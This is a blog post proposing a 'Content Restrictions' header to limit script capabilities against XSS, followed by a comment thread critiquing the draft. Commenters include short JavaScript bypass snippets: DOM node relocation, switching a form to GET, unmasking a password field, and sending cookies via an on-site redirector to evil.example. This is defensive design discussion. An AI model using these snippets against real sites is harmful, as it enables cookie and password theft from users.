Currently, the only defence against Cross-Site Scripting (XSS) attacks is server-side filtering of untrusted content. If that fails, the user agent is wide open. In the absence of any information from the site designer, the user agent cannot decide which scripts in the page to execute and which not to; it has to execute them all.
So, the perfect way to prevent XSS attacks would be for the user agent to read the website designer’s mind to determine which scripts embedded in a page were legitimate and which were malicious. In the absence of affordable and reliable mind-reading technology, and in consideration of the mental fatigue this would undoubtedly induce in web page authors, my new paper, “Content Restrictions”, presents the draft specification of a way for a site designer to explain his state of mind to the user agent by specifying restrictions on the capabilities of his content.
I hope to turn this into a draft RFC soon, so any comments would be extremely welcome.
I think the DOM is flexible enough that several of the restrictions can be circumvented. Some examples:
The ‘create’ restrictions do not necessarily make things any safer. If we take eBay, for example, a malicious user could type in any number of HTML elements with ID attributes inside a hidden div, along with a script that moves the elements via the DOM to their desired places – no need to create elements, but still “complete page transformation”.
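A minimal sketch of the sort of payload I have in mind (the markup and ID are made up):

    <div style="display:none">
      <div id="fake-login">...attacker-supplied markup...</div>
    </div>
    <script>
      // Nothing is created here, so a 'create' restriction never fires:
      // the nodes already exist in the page, the script merely relocates them.
      var payload = document.getElementById("fake-login");
      document.body.insertBefore(payload, document.body.firstChild);
    </script>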
‘request=nopost’ does not protect “dangerous operations” – it would be very easy to change the form’s method attribute value to GET before submitting. Therefore, if the server-side app does not differentiate between GET and POST parameters (and some scripting languages do not, by default), any script could still auto-trigger actions.
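Something along these lines, assuming the dangerous form is already in the page:

    <script>
      // Resubmit an existing POST form as GET; if the server-side app reads
      // parameters without caring about the request method, the action fires anyway.
      var f = document.forms[0];
      f.method = "get";
      f.submit();
    </script>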
Similarly, a ‘forms=nopassword’ clause will be useless if it does not prevent scripts from manipulating the input element via the DOM: for example, a script could set its type attribute to “text” (or remove it altogether), read out the password, and change it back.
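Roughly like this (the field ID is made up):

    <script>
      // If the restriction only guards inputs whose type is "password",
      // flipping the type briefly sidesteps it.
      var pw = document.getElementById("password");
      pw.type = "text";
      var stolen = pw.value;
      pw.type = "password";
      // 'stolen' could then be sent elsewhere, e.g. as part of an image URL.
    </script>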
Oh, and having a domain restriction on request targets won’t help the mass of sites that have a redirect CGI script (e.g. to de-refer external links) on their own domain (though they could move this script to another domain).
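For example (the script name and parameter are invented):

    <script>
      // The request target stays on the allowed domain; the site's own
      // redirector then forwards the stolen data wherever the attacker likes.
      new Image().src = "/cgi-bin/redirect?url=http://evil.example/?c=" +
                        encodeURIComponent(document.cookie);
    </script>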
The above examples are not necessarily flaws in the spec, but the issues should at least be named, so as not to lull web page authors into a false sense of security. (By the way, these crossed my mind after a first read of the spec; one might expect other people to find more “workarounds” over time, not counting any potential flaws in implementations of the spec.)
Perhaps the most secure way would be to just include script=none as a restriction. However, as the original web site author might need his own JavaScript snippets on the pages, it would be nice to be able to designate “script-free areas” within the page. Thinking of eBay again, this might be used to tell the user agent: do not execute any <script> elements or onXXX event handlers within the element with ID=zzz and below (where the untrusted user-supplied content is inserted).
Another idea may be to specify the restrictions on elements using an attribute, e.g. <div script="none"></div>. This would allow different policies for different parts of the page, and it may even reduce the need for so many restriction types.
Perhaps this is an idea for the WHATWG.
Instead of a simple ‘create’ restriction, what about a broader one that could cover creating, moving, or removing nodes, editing attributes, etc.?
Check out http://www.shocking.com/~rsnake/xss.html for all the evasion techniques. I like Christian’s idea personally. Any way to restrict the page is good, although now you just have to make sure the bad guys can’t close the div tag inappropriately.
Jason: all the techniques on the page you give are irrelevant, as they are about sneaking script past server-side filters. This proposal is about limiting the capabilities of script once it’s running.
Gerv, I remember reading a proposal very much like yours (actually Christian’s) on www-talk (IIRC) a few years ago. It got shot down quickly with the argument that it’s the server side’s business to filter the bad stuff out of its pages.
As far as I understand, your proposal applies to the whole document. If a site wanted to do that, it could just serve the untrusted content from a different host (different hosts are like different domains to us, unless overridden by pages) and you would get almost the same effect.
That’s uninteresting in most cases, because the most common and dangerous case is when content is mixed on the same page. The dead-simple eBay, webmail, forum etc. cases are all like this (and they don’t use frames, for other good reasons).
This hints at how different uses have different needs, which suggests that it’s better to do it solely server-side. I’m not saying that it’s a bad idea, though.
But I really don’t want holes in the implementation or the spec to be counted as “security holes” in the browser :).
Christian: Another idea may be to specify the restrictions on elements using an attribute, e.g. <div script="none"></div>. This would allow different policies for different parts of the page, and it may even reduce the need for so many restriction types.
My biggest problem with this is that it mixes behavior with content. Ideally we should be able to craft something that doesn’t leave the recesses of the <head> or the HTTP headers. Maybe we could have the restriction header point to a file with a similar format to CSS selectors or XPath or something (i.e. use div{script:none} instead).
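Purely to illustrate the shape of the idea (neither the header parameter nor the file syntax below is anything the draft actually defines):

    Content-Restrictions: policy=/restrictions.txt

    /* restrictions.txt */
    *            { script: head; cookies: none }
    div#comments { script: none }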
Gerv: what useful operations would still be possible if you restricted script that much?
Sorry, I didn’t make myself clear. I was thinking that these would be disabled/enabled individually (i.e. *{create:none; move:all; editattributes:none; etc.}).
Also, regarding the create restriction, I think it should be divided by types of nodes (elements, text, and maybe more) and by elements that refer to an external resource (<img>, <frame>, <iframe>, etc.).
Another thing I noticed. With the ‘forms’ restriction what exactly do the values mean?
I assume ‘none’ means to remove all form controls
‘read’ means to set them all to readonly="readonly"
‘write’: would that mean something like the form controls are still there but all invisible? Should just the content be invisible, or something like setting all <input type="text"> to <input type="password">?
‘nopassword’: same problem as ‘write’.
Ben:
I think we now have fairly clear evidence that this attitude just doesn’t cut it. :-)
For most of the proposed restrictions, the effect is very different. It’s roughly the same for the very limited case of restricting read and write access to cookies, but that’s only a tiny part of the proposal. How do you say “only allow script in the head to run” using an external host? Or “only allow read access to form control values”?
Also, many people don’t have access to a different host.
There are several parts of the proposal which are aimed at exactly this scenario. For example, if the legit code didn’t need to access cookies, you could set cookies=none and then any injected code couldn’t access them either. If the legit code was all in the head, set script=head and any injection into the body is useless. Etc. etc.
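For instance, an eBay item page might send something like this (the exact header syntax is beside the point here; it’s the keywords that matter):

    Content-Restrictions: script=head, cookies=none

Any script injected into the item description lands in the body, so it never runs, and even if it somehow did, it couldn’t read the user’s cookies.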
They can’t. That’s another advantage of a “restrictions” model. If there’s a hole in our implementation of the “forms” keyword, then it’s just as if we don’t support that one yet. Which is fine, and allowed. It just means some attacks which might be prevented aren’t – but then, in a user agent which didn’t support Content-Restrictions at all, they wouldn’t be prevented either.
Alan: you’ve got the wrong end of the stick about the “forms” thing a bit. None doesn’t mean “remove all form controls”, it means “you can’t access any form controls via script”. Similarly, “read” means “you can read their values, but not write them”, and “write” means the opposite.
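To illustrate the difference (the control name is made up), under forms=read a script could do the first of these but not the second, and under forms=write the reverse:

    <script>
      var q = document.forms[0].elements["q"];
      var current = q.value;    // reading a control's value
      q.value = "injected";     // writing a control's value
    </script>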